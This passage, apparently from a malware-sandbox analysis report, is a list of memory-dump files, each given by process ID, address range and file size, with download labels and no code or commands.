                                                                                                                                                                                                                          100KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4132-135-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1.5MB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4132-139-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          100KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4132-134-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          100KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4132-118-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4132-133-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          572KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4132-136-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          152KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4132-138-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          100KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4172-477-0x0000000005230000-0x0000000005231000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4248-143-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4252-145-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4356-141-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4360-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4372-308-0x0000000007150000-0x0000000007151000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4372-294-0x0000000000280000-0x0000000000281000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4372-256-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4372-316-0x0000000004BF0000-0x0000000004BF1000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4372-305-0x00000000023A0000-0x00000000023A1000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4372-314-0x0000000007850000-0x0000000007851000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4392-259-0x00000000000E0000-0x00000000000E1000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4392-255-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4396-279-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4488-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4508-391-0x0000026BCF330000-0x0000026BCF3A4000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          464KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4508-398-0x0000026BCF270000-0x0000026BCF2BD000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          308KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4716-207-0x0000000000400000-0x000000000042C000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          176KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4716-193-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4840-457-0x0000000001210000-0x0000000001250000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          256KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4840-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4840-325-0x0000000000480000-0x0000000000489000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          36KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4840-327-0x0000000000400000-0x000000000042C000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          176KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4852-262-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4852-419-0x00000000021A0000-0x0000000002274000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          848KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4852-436-0x0000000000400000-0x00000000004D7000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          860KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4888-337-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          80KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4888-329-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4896-290-0x0000000002BB0000-0x0000000002BB1000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4896-276-0x0000000000B40000-0x0000000000B41000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4896-263-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4944-313-0x0000000005120000-0x0000000005121000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4944-304-0x0000000000750000-0x0000000000751000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4944-317-0x00000000051D0000-0x00000000051D1000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/4944-297-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/5008-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/5148-367-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/5148-345-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/5172-399-0x000001BC8BCD0000-0x000001BC8BD44000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          464KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/5204-351-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/5232-353-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/5248-354-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/5372-360-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/5372-372-0x0000000005420000-0x0000000005421000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/5536-370-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          80KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/5536-366-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/5712-374-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/5712-379-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/5752-375-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/5884-392-0x00000000047B1000-0x00000000048B2000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1.0MB

                                                                                                                                                                                                                          Download
                                                                                                                                                                                                                        • memory/5884-395-0x00000000048D0000-0x000000000492F000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          380KB

                                                                                                                                                                                                                          Download